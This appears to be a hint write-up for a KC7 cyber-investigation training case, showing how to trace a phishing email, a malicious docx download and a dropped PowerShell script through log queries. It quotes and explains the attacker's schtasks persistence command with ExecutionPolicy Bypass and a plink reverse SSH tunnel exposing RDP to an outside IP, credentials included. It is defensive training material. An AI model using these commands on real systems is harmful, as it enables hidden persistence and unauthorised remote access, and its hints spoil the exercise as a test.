This post is a write-up or clues on how to resolve the KC7 investigation case of A Scandal in Valdoria - Section 3: Plenty of Phish . You can use it as a helpful guide when you encounter an obstacle, as it structured as a fill-in-the-blanks solution.
Section 3: Plenty of Phish
Question 1: What is Sonia’s job role?
Table
| where <field> <operator> "Sonia Gose"
Question 2: What email address was used to send this email?
Type the email address newspaper_jobs@gmail.com
.
Question 3: When was the email sent to Sonia Gose? Enter the exact timestamp from the logs.
The sender’s email address was provided to us in question number 2. Also, we have Sonia Gose from the Employee table.
Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">
Question 4: What URL was included in the email?
Answer from question 3.
Question 5: What is Sonia Gose’s IP address?
Answer from question 1.
Table
| where <field> <operator> "Sonia Gose"
Question 6: Did Sonia click on this link? If so, enter the timestamp when she clicked the link. If not, type “no”
Table
| where <field> <operator> <Sonia Gose's IP address>
and <field> <operator> <URL> //Q4
Question 7: What was the name of the docx file in link that Sonia clicked?
Just the file name not the full link in the answer to question 4.
Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">
Question 8: What is Sonia Gose’s hostname?
Table
| where <field> <operator> "Sonia Gose"
Question 9: When did the downloaded docx file first show up on Sonia’s machine?
Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7
Question 10: What was the full path of the docx file that was downloaded to Sonia’s machine?
Answer from question 9.
Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7
Question 11: What is the sha256 hash of the file that Sonia downloaded?
Answer from question 9.
Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7
Question 12: What is the name of the file (.ps1) that was written to disk immediately after the docx was downloaded?
Only the file name.
Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000) //timestamp after the event
Question 13: When was this new file created?
Timestamp from answer to question 12.
Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000)
Question 14: Let’s do some research! What type of file is this?
Use your Google-Fu skills!
Question 15: What does the attacker say to “let you know they are here”?
Lol! Do you see it 😄.
Question 16: According to the PowerShell script, what might be the hacker’s favorite color?
It is in the image from question 15.
Question 17: The purpose of the script is to invoke ____ and uncover da truth
It is in the image from question 15.
Question 18: How many Process Events are there related to this PowerShell script on Sonia’s machine?
Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"
| count
Question 19: What is the full command used to create the scheduled task?
From question 18. Do you see it? It is in task scheduler.
Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"
Question 20: What ExecutionPolicy is set in the command?
The policy will allow the script to run without restrictions.
This PowerShell command is using schtasks to create a scheduled task in Windows. Here is a breakdown of the command and what each part does:
schtasks
: This is a command-line tool in Windows used to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.
/create
: This flag tellsschtasks
that you want to create a new scheduled task.
/sc hourly
: This parameter specifies the schedule type for the task. In this case,hourly
indicates that the task should run every hour.
/mo 5
: This modifies the schedule set by/sc
. Here, it means the task will run every 5 hours.
/tn "Hacktivist Manifesto"
: This sets the name of the task. The task will be identified in the Task Scheduler as “Hacktivist Manifesto”.
/tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1"
: This sets the action that the task will execute. Here, it runspowershell.exe
with the specified parameters:
-ExecutionPolicy Bypass
: This bypasses the PowerShell execution policy, allowing the script to run without restrictions.-File C:\ProgramData\hacktivist_manifesto.ps1
: This specifies the path to the PowerShell script that should be executed.In summary, this command creates a scheduled task named “Hacktivist Manifesto” that runs a PowerShell script located at
C:\ProgramData\hacktivist_manifesto.ps1
every 5 hours, bypassing any execution policy restrictions.
Question 21: What IP address is used when plink is executed?
ProcessEvents
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "plink.exe"
The plink.exe is a command-line interface to the PuTTY back ends.
plink.exe
: This is the command-line interface to the PuTTY SSH client.
-R 3389:localhost:3389
: This sets up a reverse SSH tunnel. Here’s what each part means:
-R
: This specifies a reverse tunnel.3389:localhost:3389
: This maps port 3389 on the remote machine to port 3389 on the local machine. Port 3389 is commonly used for Remote Desktop Protocol (RDP).
-ssh
: This tellsplink.exe
to use the SSH protocol for the connection.
-l $had0w
: This specifies the username to log in as on the remote machine. In this case,$had0w
.
-pw thruthW!llS3tUfree
: This specifies the password for the user$had0w
.
136.130.190.181
: This is the IP address of the remote machine to which you are connecting.
This command sets up a reverse SSH tunnel from the local machine to the remote machine at IP address 136.130.190.181 using the username $had0w** and the password thruthW!llS3tUfree. It maps port 3389 on the remote machine to port 3389 on the local machine. This allows you to connect to the Remote Desktop service on the local machine via the remote machine’s IP address and port 3389. Essentially, you can use this to remotely access the local machine’s desktop environment through the remote machine.
Question 22: What username did the attacker use when connecting via plink?
Answer from question 21.
Question 23: What password did the attacker use when connecting via plink?
Answer from question 21.
Question 24: What six-letter command did the attackers run to figure out which user they are logged on as on the computer?
The timestamp from answer question 21.
ProcessEvents
| where hostname == "<Sonia Gose's Hostname>"
| where timestamp >= datetime(2024-01-06 02:39:35)
Question 25: How many discovery commands did the attackers run on this machine?
Answer from question 24. Check MITRE ATT&CK ID: T1018
Question 26: Do you think we can safely stop our investigation here? (yes/no)
🤔
Community Help
Join Discord to discuss the module KC7 Discord #valdoria .